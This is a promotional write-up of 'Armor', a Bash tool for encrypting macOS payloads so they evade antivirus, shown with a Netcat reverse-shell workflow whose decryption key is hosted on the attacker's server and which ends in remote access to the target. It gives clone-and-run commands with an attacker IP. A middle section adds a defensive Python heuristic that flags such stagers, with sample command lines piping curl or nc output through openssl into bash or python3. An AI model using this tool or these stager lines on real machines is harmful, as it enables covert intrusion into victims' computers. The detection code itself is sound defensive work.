Armor – Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners


Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload.

A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook and the attacker's Netcat listener. Armor is used to encrypt the Bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed on the target MacBook (not shown in the gif), the Bash one-liner is decrypted and executed without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.
Admittedly, encrypting most macOS-specific payloads is overkill. This particular Bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an example. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.
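The workflow described above has a recognisable shape on the target host: a network fetch of the key, an openssl decrypt stage, and an interpreter reading its program from stdin, all joined by pipes so nothing is written to disk. The following is an added example from the defender's side, not code from Armor or its author: a small triage heuristic that splits a process command line into its pipeline stages and flags that fetch-decrypt-execute pattern. The sample command lines are constructed for the example and use the placeholder host KEY_HOST; the tool and interpreter name lists are assumptions chosen for illustration.

```python
"""
Heuristic for spotting the in-memory "fetch key, decrypt, pipe into an
interpreter" stager shape on a process command line.  Added example for
defenders; not part of Armor.  Sample command lines are constructed.
"""
import os
import re
import shlex

# Assumed lists for the example; extend to match your environment.
FETCH_TOOLS = {"curl", "wget", "nc", "ncat", "netcat"}
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "ruby", "perl", "osascript"}
WRAPPERS = {"sudo", "env", "nohup"}
# openssl in decrypt mode: "enc ... -d" or "enc ... -decrypt" within one stage
DECRYPT_RE = re.compile(r"\bopenssl\b.*\benc\b.*\s(-d|-decrypt)\b")
# interpreter explicitly told to read its program from stdin
STDIN_ARGS = {"-", "/dev/stdin"}

# Constructed samples (placeholder host KEY_HOST); the last three have the stager shape.
SAMPLE_CMDLINES = [
    "openssl enc -aes-256-cbc -d -in backup.tar.enc -out backup.tar -pass file:/tmp/k",
    "cat setup.sh | bash",
    "curl -s http://KEY_HOST:443/ | openssl enc -aes-256-cbc -d -pass stdin -in /tmp/p.enc | bash",
    "nc KEY_HOST 443 | openssl enc -d -aes-256-cbc -pass stdin -in payload.enc | python3 -",
    "openssl enc -d -aes-256-cbc -pass file:/tmp/k -in p.enc | bash",
]


def _stages(cmdline):
    """Split on '|' (naive: ignores quoted pipes, acceptable for triage) and
    return each stage as a token list with sudo/env/nohup wrappers removed."""
    stages = []
    for raw in cmdline.split("|"):
        try:
            toks = shlex.split(raw)
        except ValueError:
            toks = raw.split()
        while toks and os.path.basename(toks[0]) in WRAPPERS:
            toks = toks[1:]
        stages.append(toks)
    return stages


def _reads_program_from_stdin(toks):
    """True if the stage is an interpreter that will execute whatever is piped in:
    a shell with no script path, or any interpreter given '-' / '/dev/stdin'."""
    prog = os.path.basename(toks[0]) if toks else ""
    if prog not in INTERPRETERS:
        return False
    positional = [t for t in toks[1:] if not t.startswith("-") or t in STDIN_ARGS]
    return not positional or any(t in STDIN_ARGS for t in positional)


def analyze(cmdline):
    """Return which stages of the stager shape are present and a confidence level.
    'high' means a network fetch feeds the decrypt stage (key never on disk);
    'medium' means decrypt output is executed but the key source is local."""
    fetch_idx = decrypt_idx = sink_idx = None
    for i, toks in enumerate(_stages(cmdline)):
        if not toks:
            continue
        prog = os.path.basename(toks[0])
        if fetch_idx is None and prog in FETCH_TOOLS:
            fetch_idx = i
        if decrypt_idx is None and DECRYPT_RE.search(" ".join(toks)):
            decrypt_idx = i
        if _reads_program_from_stdin(toks):
            sink_idx = i
    flagged = decrypt_idx is not None and sink_idx is not None and decrypt_idx < sink_idx
    if flagged and fetch_idx is not None and fetch_idx < decrypt_idx:
        confidence = "high"
    elif flagged:
        confidence = "medium"
    else:
        confidence = "none"
    return {
        "fetch": fetch_idx is not None,
        "decrypt": decrypt_idx is not None,
        "stdin_interpreter": sink_idx is not None,
        "flagged": flagged,
        "confidence": confidence,
    }


def scan(cmdlines):
    """Return (cmdline, result) pairs for every flagged command line."""
    hits = []
    for c in cmdlines:
        r = analyze(c)
        if r["flagged"]:
            hits.append((c, r))
    return hits


if __name__ == "__main__":
    for c, r in scan(SAMPLE_CMDLINES):
        print(r["confidence"].upper(), c)
```

The heuristic only looks at pipeline structure, so a benign decrypt-to-file and a plain `cat script | bash` both stay unflagged, while the combination of a decrypt stage feeding an interpreter is what raises an alert; feeding it from EDR process-creation events rather than a static list is the obvious next step.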

Installation
Armor relies on LibreSSL to encrypt the input file and create the SSL certificates. If LibreSSL is not present on your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.
Armor can be cloned and executed using the commands below.

git clone https://github.com/tokyoneon/Armor
cd Armor/
chmod +x armor.sh
./armor.sh /path/to/payload.txt 1.2.3.4 443

The 1.2.3.4 address is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or a VPS. The port number (443) is arbitrary and can be changed as needed.